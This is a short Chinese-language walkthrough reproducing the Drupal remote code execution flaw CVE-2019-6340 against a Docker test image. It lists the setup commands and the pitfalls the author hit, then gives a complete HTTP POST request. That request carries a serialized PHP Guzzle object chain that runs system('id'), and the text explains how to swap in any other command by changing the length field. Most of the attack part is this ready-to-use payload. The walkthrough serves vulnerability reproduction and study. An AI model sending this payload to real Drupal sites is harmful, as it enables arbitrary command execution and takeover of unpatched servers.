Drupal RCE(CVE-2019-6340)复现踩坑
CVE-2019-6340 影响范围:Drupal < 8.6.10,Drupal < 8.5.12
1、搜索镜像
docker search cve-2019-6340
2、拉取
docker pull knqyf263/cve-2019-6340
3、运行
docker run -d -t -p 80:80 knqyf263/cve-2019-6340
4、访问url:http://174.99.8.203/node/1
5、抓取数据包并修改
注意三点:
A、POST /node/?_format=hal_json
B、Content-Type: application/hal+json
C、/rest/type/shortcut/default
本次复现踩坑。
POST /drupal8.x/node/?_format=hal_json
/drupal/rest/type/shortcut/default
Content-Type: application/x-www-form-urlencoded
6、命令修改,修改s:2:"id";id为执行的命令,2为命令长度。
POST /node/?_format=hal_json HTTP/1.1
Host: 174.99.8.203
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://174.99.8.203/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/hal+json
Content-Length: 630
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href":"http://174.99.8.203/rest/type/shortcut/default"
}
}
}
7、成功执行
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。